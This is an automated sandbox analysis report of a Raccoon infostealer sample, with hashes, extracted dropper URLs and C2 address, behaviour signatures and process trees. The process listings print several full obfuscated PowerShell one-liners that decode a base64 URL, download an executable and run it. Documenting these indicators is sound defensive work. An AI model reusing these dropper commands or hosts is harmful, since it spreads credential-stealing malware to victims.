raccoon | 36de4b0fc17f71c1081e39ce702680bef32f4a5ba60145bb9f6759691d1e3460

Analysis

max time kernel
47s
max time network
33s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
04-02-2023 21:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe
Size

332KB
MD5

5c011fd59a60dc0db2dee6f6aa60e79d
SHA1

d0458c2cc16be344791f135d5dbd6cb68888ca29
SHA256

36de4b0fc17f71c1081e39ce702680bef32f4a5ba60145bb9f6759691d1e3460
SHA512

bce00a7b914a1b9018a2f114cba88e52f07f10d1237f77380e58c34fb32380f9c8ecaa2406fcec1d916c85b61a461f8c5dc1da35c63162449eee020ffb2ea2cc
SSDEEP

6144:rWEVkoStOdrlqgh0p7DJ5cAT4HUV39zY1YfAh4Ua/apTBJ6:iECoStOHx2ppTV39Noh4Ua/apTr6

Score

10^/10

raccoon 75ea4cb7f040eb3056eaa4e86a3a9d6c stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://nicoslag.ru/asdfg.exe

exe.dropper

http://nicoslag.ru/asdfg.exe

Extracted

Family

raccoon

Botnet

75ea4cb7f040eb3056eaa4e86a3a9d6c

http://91.215.85.146/

rc4.plain

Signatures

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

12 816 powershell.exe
13 1312 powershell.exe
14 1272 powershell.exe
16 892 powershell.exe
17 268 powershell.exe
Downloads MZ/PE file

flow	pid	process
12	816	powershell.exe
13	1312	powershell.exe
14	1272	powershell.exe
16	892	powershell.exe
17	268	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

brv.exebrv.exeych.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Control Panel\International\Geo\Nation	brv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Control Panel\International\Geo\Nation	brv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Control Panel\International\Geo\Nation	ych.exe

Executes dropped EXE 6 IoCs

Processes:

brv.exeych.exebrv.exeych.exebrv.exebrv.exe

pid process

2240 brv.exe
2304 ych.exe
2460 brv.exe
2580 ych.exe
2568 brv.exe
2592 brv.exe
Loads dropped DLL 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1272 powershell.exe
268 powershell.exe

pid	process
2240	brv.exe
2304	ych.exe
2460	brv.exe
2580	ych.exe
2568	brv.exe
2592	brv.exe

pid	process
1272	powershell.exe
268	powershell.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/844-66-0x0000000000400000-0x0000000000422000-memory.dmp	upx

Suspicious use of SetThreadContext 3 IoCs

Processes:

ych.exebrv.exebrv.exe

description	pid	process	target process
PID 2304 set thread context of 2580	2304	ych.exe	ych.exe
PID 2460 set thread context of 2568	2460	brv.exe	brv.exe
PID 2240 set thread context of 2592	2240	brv.exe	brv.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1696 timeout.exe
1652 timeout.exe

pid	process
1696	timeout.exe
1652	timeout.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exemshta.exemshta.exemshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1952	powershell.exe
1312	powershell.exe
816	powershell.exe
1272	powershell.exe
268	powershell.exe
892	powershell.exe
1272	powershell.exe
1272	powershell.exe
268	powershell.exe
268	powershell.exe
1952	powershell.exe
1952	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exebrv.exeych.exebrv.exe

description	pid	process
Token: SeDebugPrivilege	1952	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	816	powershell.exe
Token: SeDebugPrivilege	1272	powershell.exe
Token: SeDebugPrivilege	268	powershell.exe
Token: SeDebugPrivilege	892	powershell.exe
Token: SeDebugPrivilege	2460	brv.exe
Token: SeDebugPrivilege	2304	ych.exe
Token: SeDebugPrivilege	2240	brv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exe

description	pid	process	target process
PID 844 wrote to memory of 1156	844	36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe	cmd.exe
PID 844 wrote to memory of 1156	844	36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe	cmd.exe
PID 844 wrote to memory of 1156	844	36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe	cmd.exe
PID 844 wrote to memory of 1156	844	36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe	cmd.exe
PID 1156 wrote to memory of 1204	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1204	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1204	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1204	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 760	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 760	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 760	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 760	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1696	1156	cmd.exe	timeout.exe
PID 1156 wrote to memory of 1696	1156	cmd.exe	timeout.exe
PID 1156 wrote to memory of 1696	1156	cmd.exe	timeout.exe
PID 1156 wrote to memory of 1696	1156	cmd.exe	timeout.exe
PID 760 wrote to memory of 1952	760	mshta.exe	powershell.exe
PID 760 wrote to memory of 1952	760	mshta.exe	powershell.exe
PID 760 wrote to memory of 1952	760	mshta.exe	powershell.exe
PID 760 wrote to memory of 1952	760	mshta.exe	powershell.exe
PID 1204 wrote to memory of 1312	1204	mshta.exe	powershell.exe
PID 1204 wrote to memory of 1312	1204	mshta.exe	powershell.exe
PID 1204 wrote to memory of 1312	1204	mshta.exe	powershell.exe
PID 1204 wrote to memory of 1312	1204	mshta.exe	powershell.exe
PID 1156 wrote to memory of 1620	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1620	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1620	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1620	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1300	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1300	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1300	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1300	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1652	1156	cmd.exe	timeout.exe
PID 1156 wrote to memory of 1652	1156	cmd.exe	timeout.exe
PID 1156 wrote to memory of 1652	1156	cmd.exe	timeout.exe
PID 1156 wrote to memory of 1652	1156	cmd.exe	timeout.exe
PID 1620 wrote to memory of 816	1620	mshta.exe	powershell.exe
PID 1620 wrote to memory of 816	1620	mshta.exe	powershell.exe
PID 1620 wrote to memory of 816	1620	mshta.exe	powershell.exe
PID 1620 wrote to memory of 816	1620	mshta.exe	powershell.exe
PID 1300 wrote to memory of 1272	1300	mshta.exe	powershell.exe
PID 1300 wrote to memory of 1272	1300	mshta.exe	powershell.exe
PID 1300 wrote to memory of 1272	1300	mshta.exe	powershell.exe
PID 1300 wrote to memory of 1272	1300	mshta.exe	powershell.exe
PID 1156 wrote to memory of 1476	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1476	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1476	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1476	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1524	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1524	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1524	1156	cmd.exe	mshta.exe
PID 1156 wrote to memory of 1524	1156	cmd.exe	mshta.exe
PID 1476 wrote to memory of 892	1476	mshta.exe	powershell.exe
PID 1476 wrote to memory of 892	1476	mshta.exe	powershell.exe
PID 1476 wrote to memory of 892	1476	mshta.exe	powershell.exe
PID 1476 wrote to memory of 892	1476	mshta.exe	powershell.exe
PID 1524 wrote to memory of 268	1524	mshta.exe	powershell.exe
PID 1524 wrote to memory of 268	1524	mshta.exe	powershell.exe
PID 1524 wrote to memory of 268	1524	mshta.exe	powershell.exe
PID 1524 wrote to memory of 268	1524	mshta.exe	powershell.exe
PID 1272 wrote to memory of 2240	1272	powershell.exe	brv.exe
PID 1272 wrote to memory of 2240	1272	powershell.exe	brv.exe
PID 1272 wrote to memory of 2240	1272	powershell.exe	brv.exe
PID 1272 wrote to memory of 2240	1272	powershell.exe	brv.exe

C:\Users\Admin\AppData\Local\Temp\36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe
"C:\Users\Admin\AppData\Local\Temp\36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe"
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe"
- Suspicious use of WriteProcessMemory
PID:1156

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\m1.hta"
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL imhur $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;imhur pkzwjshtlmgd $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzwjshtlmgd;imhur brvxmhkwft $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JpWA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);brvxmhkwft $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\m1a.hta"
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL cfgtiyleoxj $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;cfgtiyleoxj rxjawksc $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rxjawksc;cfgtiyleoxj lkhxvdgpjitz $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);lkhxvdgpjitz $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Users\Public\brv.exe
"C:\Users\Public\brv.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2460

C:\Users\Public\brv.exe
C:\Users\Public\brv.exe
- Executes dropped EXE
PID:2568

C:\Windows\SysWOW64\timeout.exe
timeout 1
- Delays execution with timeout.exe
PID:1696

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b1.hta"
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL cfpdmyg $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;cfpdmyg pnuqyjbf $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pnuqyjbf;cfpdmyg josedgvxy $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JqaQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);josedgvxy $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:816

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b1a.hta"
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL pgnfirdewovxsl $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;pgnfirdewovxsl ezosprk $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|ezosprk;pgnfirdewovxsl ctslxmfoz $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);ctslxmfoz $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1272

C:\Users\Public\brv.exe
"C:\Users\Public\brv.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Users\Public\brv.exe
C:\Users\Public\brv.exe
- Executes dropped EXE
PID:2592

C:\Windows\SysWOW64\timeout.exe
timeout 2
- Delays execution with timeout.exe
PID:1652

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b2.hta"
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vqaznm $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vqaznm amvlntpxjbs $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|amvlntpxjbs;vqaznm gbxlmur $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JqeA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);gbxlmur $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:892

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b2a.hta"
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xutrghv $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xutrghv hjlgdycxt $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|hjlgdycxt;xutrghv gbljpredwuxzv $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);gbljpredwuxzv $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Users\Public\ych.exe
"C:\Users\Public\ych.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\Users\Public\ych.exe
C:\Users\Public\ych.exe
- Executes dropped EXE
PID:2580

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b1.hta
Filesize
11KB

MD5
d4aea3933a604f7dc3f9608929ef07b6

SHA1
95de25c9656d1503b30726760dc6764fa298461e

SHA256
9439c1e812b86678969732dd29d9a5c0d271db87005df6b36b79aab7556610e2

SHA512
61a1ba9e1d624a00585af95923641145c0fc1a56fac3de3094f8c1a3b7dee37b14088086cce2c78d154e23848d698a68145b44b3086221952ab65bddfc54c038

Download Submit
C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b1a.hta
Filesize
11KB

MD5
b8be7ddadc6d5361e90c28b4739274ac

SHA1
a225cf279c6cb7710141aeb3e0a29ad4c19e71e4

SHA256
152d6a623e294608e0fcfb331f0fd4e5eabd8d4b70673004d4ac33156add121c

SHA512
b4e0b038b7eb43838d7d7d2aad7acc9ee444ac913aa345103efb097c0b41fb70a6aff64e89e75925c4caa2f55d039b1c8121dcb0f540336f7bc6a93746bf9230

Download Submit
C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b2.hta
Filesize
11KB

MD5
611851be5c9d72fba0536042853b6b10

SHA1
b0ec6e71573902ca1e3fd17bc6fac96d5f232700

SHA256
a4965af6feb2c0f3d8c7f81808b77b10bfbb396bcc63fc430f8606b8cf14f24f

SHA512
db597666d50850628e17b2c91102b0d45ed613dfa62f3472e6c0e3fec51758347f7327958177a8ba85adc32ca7be7e7c92d7036999270cc84bba1cfcb93b7b33

Download Submit
C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b2a.hta
Filesize
11KB

MD5
1a98a8caf12608427d1b239c053a41fe

SHA1
870e04c385b65d5ba02637f99d12129b76ebae3b

SHA256
a9de29fa03e6b7a0d307e495a30bcc181064e67ba4c62b00eecbddcf11034002

SHA512
fb967e221882bb9dafec3d651a8031e4f53aed3231b76559a4c50292840fc8bfc496e75baf0f810d93694dbb94ef2cbd85f11cd774d075ab36846d85b4e70c0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\m1.hta
Filesize
11KB

MD5
b89401d49ae639b07b31c8fb3a2b6660

SHA1
50e59ce06aa2bf94a11f64afef20961e76c9d426

SHA256
48382eae4aa1e069d09c4a5d25d22e9027b16b65a48911bfc0c8f1f23b1de4a2

SHA512
e03a5521a2ecba8d4063d5406d253139540958d510147f962180ad8333175837a8453bb3b69316bb7a8abe66670b42ef9567260f549cbbc2ebb293d2050188b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\m1a.hta
Filesize
11KB

MD5
fd6a9f7c9cf2d58ef8935fa062eab5bf

SHA1
a3a03ce457d6820e4344abcbf90330c29aa8ab85

SHA256
83c6b29a8be68fa9c0cc88fec453da1c23a456bf330b2cfdff1968da576ec727

SHA512
f7598f335765d2e7ac08696e3db18261f8c8a7d901fad4c17839f8b5f1fca38ef38aa653971ddabfa95e9c5b446c4511e0716c0a636e427cb5fbb7eb349b7760

Download Submit
C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\start.bat
Filesize
152B

MD5
e57355079adb8a7e6a12c715d903bb0e

SHA1
c91b8e7418cca569a21c23235ee0e9f3fabd5bc5

SHA256
c5e6918b630712035a38f8dfc73645659d68504cc268b1a27db8bd81afe80457

SHA512
5a3992dd2cfe2ae9a1df92699759900d8d339139b0f41a46b19158397a20ff8fbd45aebd6bdd65651b1c02cf75d578be99128b90ecde4e90c7bb2c6a38cf438c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
1e333438ff84ac126a654b2c0f63a42d

SHA1
ae99203eef6cba82c0950c56f1dbb6fd3a8a566f

SHA256
5cb5277a5eb093298c8686da50d892a63dd01ef513817776f10446fea4c671cd

SHA512
4fdf79f483a431f2bf6470d4022a72e4d3dc97fe4fea32444fa0852e5ffcea2cd2de4c233f2214f6adde6fb7ee777d615f764fe7ebabc4acee0a995b6031cc9a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
1e333438ff84ac126a654b2c0f63a42d

SHA1
ae99203eef6cba82c0950c56f1dbb6fd3a8a566f

SHA256
5cb5277a5eb093298c8686da50d892a63dd01ef513817776f10446fea4c671cd

SHA512
4fdf79f483a431f2bf6470d4022a72e4d3dc97fe4fea32444fa0852e5ffcea2cd2de4c233f2214f6adde6fb7ee777d615f764fe7ebabc4acee0a995b6031cc9a

Download Submit
